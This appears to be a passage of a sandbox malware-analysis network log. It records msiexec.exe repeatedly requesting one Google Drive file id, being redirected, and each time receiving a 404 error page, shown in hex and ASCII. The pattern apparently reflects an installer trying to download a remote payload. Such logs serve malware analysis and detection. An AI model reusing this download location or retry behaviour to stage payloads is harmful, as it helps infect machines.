2025-01-10 14:45:22 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQodhPfFNCH_5bvuArjmA8vtwF8vrWPopqbTCkqTHjqYNAtgwfyljbPlqf0B9cN8B8-9SuFq3Y Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:22 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-B6untYPBwt6NZp6jWzROgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-10 14:45:22 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 59 38 38 66 36 47 31 4f 63 73 52 58 36 68 43 66 46 6c 39 52 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KY88f6G1OcsRX6hCfFl9RA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	57072	142.250.184.238	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:23 UTC	421	OUT	GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:23 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:23 GMT Location: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-vCgbAmiPLa5BIvTJrM2gpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	57073	142.250.185.65	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:24 UTC	463	OUT	GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:25 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC642jpa9hBmOKS_H0J3_XPjAw_Mp8qef-URwNmsl6R46LcFIhZ23m5jxQRk7V1IIT27Em0noYk Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:24 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-g6RZnaCTBc3IBmTpEtzEPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-10 14:45:25 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 35 78 55 51 61 65 6c 49 4f 68 42 5a 32 4d 63 4c 68 41 32 33 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Y5xUQaelIOhBZ2McLhA23w">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	57074	142.250.184.238	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:25 UTC	421	OUT	GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:26 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:26 GMT Location: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-oMq81G66YojwkcnNh41DIA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	57075	142.250.185.65	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:26 UTC	463	OUT	GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:27 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgTItGmw0gSGNK4lisgiCpRtFGYBFvJQnaVo4KjLhZII-vMLJZ8jotq4WSXvzLOkUeGD Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:27 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-8UL9d_YX-73sKYdk8eErHQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-10 14:45:27 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 5a 70 7a 6e 44 6d 39 4a 5f 58 45 66 70 6f 44 39 42 61 38 4c 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CZpznDm9J_XEfpoD9Ba8Lw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	57077	142.250.184.238	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:28 UTC	421	OUT	GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:28 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:28 GMT Location: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-qExOY3KlY0FUOJyiMFejig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	57078	142.250.185.65	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:29 UTC	463	OUT	GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:30 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQ50_Y7lKi-k4jakiYvyCHZu3qKLi5Ef5IuJ5QO5ayrWWhXh0gZnbv1-i8-Ky1XuJGL Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:30 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-fYQ-fiEFYQzlRjLH-i2GyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-10 14:45:30 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 58 50 4d 36 72 74 52 63 30 4b 4c 6f 6c 6d 5f 31 64 49 5f 76 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xXPM6rtRc0KLolm_1dI_vQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	57079	142.250.184.238	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:30 UTC	421	OUT	GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:31 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:31 GMT Location: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-nH2NVp0UuXuc7SBEX-u6KA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	57080	142.250.185.65	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:31 UTC	463	OUT	GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
